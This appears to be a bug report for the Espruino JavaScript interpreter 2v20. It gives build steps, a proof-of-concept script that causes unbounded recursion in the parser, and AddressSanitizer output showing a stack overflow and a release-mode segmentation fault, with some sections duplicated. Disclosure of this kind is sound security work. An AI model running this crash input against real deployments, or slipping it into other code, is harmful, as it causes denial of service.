export CCFLAGS='-g -fsanitize=address -fno-omit-frame-pointer'
export LDFLAGS='-fsanitize=address'
DEBUG=1 make
Test case
testcase
```javascript
var n = " ( foo " ; try { for ( i = 0 ; i < 16 ; i ++ ) { var var0 = " a " ; n += n ; } var r = new Function ( n ) ; do { r ( ) ; try { } catch { } } } ; for ( var r = 0 ; r < 12 ; r ++ ) assertEq ( isNaN ( new Date ( 1000000.0, " " ). getTime ( ) ), isNaN ( new Date ( 1e3 ). getTime ( ) ), isNaN ( new Date ( " 123 " ) ), isNaN ( new Date ( - 1000000.0, " : " ). getTime ( ) ), n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, " done " ) ; } catch ( i ) { }
```
// poc.js
var n = " ( foo " ;
try {
for ( i = 0 ; i < 16 ; i ++ ) {
var var0 = " a " ;
n += n ;
}
var r = new Function ( n ) ;
do { r ( ) ; try { } catch { } }
} ;
Execution steps & Output
$ ./espruino poc.js
____ _
| __|___ ___ ___ _ _|_|___ ___
| __|_ -| . | _| | | | | . |
|____|___| _|_| |___|_|_|_|___|
|_| espruino.com
2v20 (c) 2023 G.Williams
Espruino is Open Source. Our work is supported
only by sales of official boards and donations:
http://espruino.com/Donate
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1963515==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe4d1d0fe5 (pc 0x556139b3d06b bp 0x7ffe4d1d1060 sp 0x7ffe4d1d0fe0 T0)
#0 0x556139b3d06a in jspeFactorFunctionCall src/jsparse.c:1220
#1 0x556139b3f753 in jspePostfixExpression src/jsparse.c:1946
#2 0x556139b3f8d2 in jspeUnaryExpression src/jsparse.c:1970
#3 0x556139b4019e in jspeBinaryExpression src/jsparse.c:2129
#4 0x556139b4037d in jspeConditionalExpression src/jsparse.c:2165
#5 0x556139b406ea in jspeAssignmentExpression src/jsparse.c:2225
#6 0x556139b3afd2 in jspeParseFunctionCallBrackets src/jsparse.c:512
#7 0x556139b3c4a4 in jspeFunctionCall src/jsparse.c:943
#8 0x556139b3d45a in jspeFactorFunctionCall src/jsparse.c:1322
#9 0x556139b3f753 in jspePostfixExpression src/jsparse.c:1946
...
...
#239 0x556139b3c4a4 in jspeFunctionCall src/jsparse.c:943
#240 0x556139b3d45a in jspeFactorFunctionCall src/jsparse.c:1322
#241 0x556139b3f753 in jspePostfixExpression src/jsparse.c:1946
#242 0x556139b3f8d2 in jspeUnaryExpression src/jsparse.c:1970
#243 0x556139b4019e in jspeBinaryExpression src/jsparse.c:2129
#244 0x556139b4037d in jspeConditionalExpression src/jsparse.c:2165
#245 0x556139b406ea in jspeAssignmentExpression src/jsparse.c:2225
#246 0x556139b3afd2 in jspeParseFunctionCallBrackets src/jsparse.c:512
#247 0x556139b3c4a4 in jspeFunctionCall src/jsparse.c:943
#248 0x556139b3d45a in jspeFactorFunctionCall src/jsparse.c:1322
SUMMARY: AddressSanitizer: stack-overflow src/jsparse.c:1220 in jspeFactorFunctionCall
==1963515==ABORTING
when executed in release mode
Output
____ _
| __|___ ___ ___ _ _|_|___ ___
| __|_ -| . | _| | | | | . |
|____|___| _|_| |___|_|_|_|___|
|_| espruino.com
2v20 (c) 2023 G.Williams
Espruino is Open Source. Our work is supported
only by sales of official boards and donations:
http://espruino.com/Donate
Segmentation fault
Espruino revision
Commit: https://github.com/espruino/Espruino/commit/fcc9ba4f12d79710f93d47ea37987cde0efce410 Version: 2v20
Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build steps
Test case
testcase
```javascript var n = " ( foo " ; try { for ( i = 0 ; i < 16 ; i ++ ) { var var0 = " a " ; n += n ; } var r = new Function ( n ) ; do { r ( ) ; try { } catch { } } } ; for ( var r = 0 ; r < 12 ; r ++ ) assertEq ( isNaN ( new Date ( 1000000.0, " " ). getTime ( ) ), isNaN ( new Date ( 1e3 ). getTime ( ) ), isNaN ( new Date ( " 123 " ) ), isNaN ( new Date ( - 1000000.0, " : " ). getTime ( ) ), n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, n, " done " ) ; } catch ( i ) { } ```
Execution steps & Output
when executed in release mode
Output
Credits: @Ye0nny, @EJueon